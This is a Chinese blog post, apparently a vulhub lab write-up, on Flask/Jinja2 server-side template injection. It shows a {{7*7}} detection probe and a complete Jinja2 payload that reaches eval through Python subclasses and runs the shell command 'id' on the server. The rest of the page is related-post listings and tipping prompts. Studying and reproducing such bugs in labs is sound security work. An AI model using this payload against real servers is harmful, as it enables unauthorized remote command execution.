Flask(Jinja2) 服务端模板注入漏洞(SSTI)

已于 2023-11-06 18:29:29 修改
阅读量462 收藏 1
点赞数 1
分类专栏: 信息安全 文章标签: flask python 网络安全 信息安全 web安全
于 2023-11-06 18:28:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_52920608/article/details/134252206
版权

Flask(Jinja2) 服务端模板注入漏洞(SSTI)

参考 https://www.freebuf.com/articles/web/260504.html
验证漏洞存在 ?name={{7*7}}
回显49说明漏洞存在
在这里插入图片描述

vulhub给出的payload:

{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if 'eval' in b.keys() %}
      {{ b['eval']('__import__("os").popen("id").read()') }}
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}

在这里插入图片描述

XXX_WXY
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
FlaskJinja2服务端模板注入漏洞
luvlettercl的博客
05-14 845
Flask是一个web框架,提供工具、库、技术来允许用户创建一个web应用程序,不依赖外部框架。 Jinja2python中被广泛应用的模块引擎,由python实现的模块语言,Flask提供render_template函数封装了该模块引擎。 漏洞复现: 手工复现: 开启环境:docker-compose up -d 访问:http://192.168.0.27:8000 payload:url/?name={{3*3}} 出现 9 即代表SSTI漏洞存在 漏洞利用: ur..
flask框架jinja2模板模板继承实例分析
09-18
主要介绍了flask框架jinja2模板模板继承,结合实例形式分析了flask框架jinja2模板的基本用法与模板继承相关实现技巧,需要的朋友可以参考下
SSTI模板注入漏洞基础
最新发布
2301_80913334的博客
06-07 573
良好的文档、丰富的插件、包含开发服务器和调试器、集成支持单元测试、RESTful请求调度、支持安全cookies、基于Unicode。
FlaskJinja2服务端模板注入漏洞——vulhub/flack/ssti
Stephen Wolf
10-31 1511
一、服务端模板注入漏洞 简述: 服务器模板注入 (SSTI ) 是一种利用公共 Web 框架的服务器端模板作为攻击媒介的攻击方式,该攻击利用了嵌入模板的用户输入方式的弱点。SSTI 攻击可以用来找出 Web 应用程序的内容结构。 二、利用搭的vulhub靶机漏洞复现 1、service docker start //进入虚拟机后开启docker服...
Flask(Jinja2)服务端模板注入 漏洞复现
Senimo
05-03 1913
FlaskJinja2服务端模板注入漏洞一、漏洞描述二、漏洞影响三、漏洞复现1、环境搭建2、漏洞复现四、漏洞POC五、参考链接六、利用工具 一、漏洞描述 模版引擎被 Web 应用程序广泛用于呈现动态数据。不安全的模版语法可以嵌入用户输入实现服务器端的模版注入,这是一个经常出现的严重漏洞。模版注入可以直接攻击 Web 服务器内部结构,并获取到远程代码执行权限(RCE)。 二、漏洞影响 三、漏洞复现 1、环境搭建 使用 Vulhub 在服务器上搭建: cd /vulhub/flask/ssti docke
Flask服务端模板(Jinja2) SSTI 注入漏洞
weixin_51387754的博客
11-22 1442
漏洞简介 flask/ssti漏洞,即: FlaskJinja2服务端模板注入漏洞(SSTI)。Flask 是一个使用 Python 编写的轻量级 Web 应用框架,Flask 为你提供工具,库和技术来允许你构建一个 web 应用程序。这个 web 应用程序可以是一些 web 页面、博客、wiki、基于 web 的日历应用或商业网站。Jinja 2是一种面向Python的现代和设计友好的模板语言。 影响版本 使用Flask框架开发并且使用Jinja2模板引擎,最重要的是模板内容可控。满足该条件的Fla
PythonFlask框架中的Jinja2模板引擎学习教程
09-21
Jinja2Flask的默认模板语言,它的语法简洁且直观,深受开发者喜爱。本教程将深入探讨Jinja2模板引擎的使用方法。 首先,模板文件通常存储在应用目录下的`templates`子目录中。例如,在`main.py`中,我们创建了一...
Flask模板引擎之Jinja2语法介绍
01-20
Jinja是组成Flask模板引擎。可能你还不太了解它是干嘛的,但你对下面这些百分号和大括号肯定不陌生: {% block body %} {% for user in users %} <li><a>{{ user.username }}</a></li> {% endfor %} {% ...
Flask模板引擎Jinja2使用实例
09-17
总结,Jinja2作为Flask的默认模板引擎,提供了丰富的功能和灵活性,使开发者能够高效地构建动态网页。通过理解这些基本概念和操作,你可以创建复杂的模板结构,并结合Flask的视图函数来生成动态内容。这只是一个起点...
kali设置中文
m0_52920608的博客
11-09 7388
kali汉化
CTFshow-web入门-命令执行
m0_52920608的博客
03-26 5312
CTFshow web入门 命令执行 ctfshowweb命令执行
Ctfhub - web -- SQL注入
m0_52920608的博客
01-28 3851
CTFHub sql注入 web mysql python脚本
FineCMS-v5.0.1漏洞审计
m0_52920608的博客
04-27 2603
FIneCMS漏洞审计
CTFHub - 信息泄露 -- Git泄露
m0_52920608的博客
01-24 2377
CTFHub 信息泄露 Git泄露
CTFHub -- 信息泄露-备份文件下载
m0_52920608的博客
01-19 2173
CTFHub -- 信息泄露-备份文件下载 网站源码 bak文件 vim缓存 ./DS_Store
flask jinja2模板渲染用法有哪些
02-06
Flask 是一个 PythonWeb 框架,Jinja2Flask 所用的模板引擎。 在使用 FlaskJinja2 渲染模板时,需要先在 Flask 应用中配置 Jinja2 模板引擎,然后在视图函数中使用 render_template() 方法渲染模板。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

XXX_WXY

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值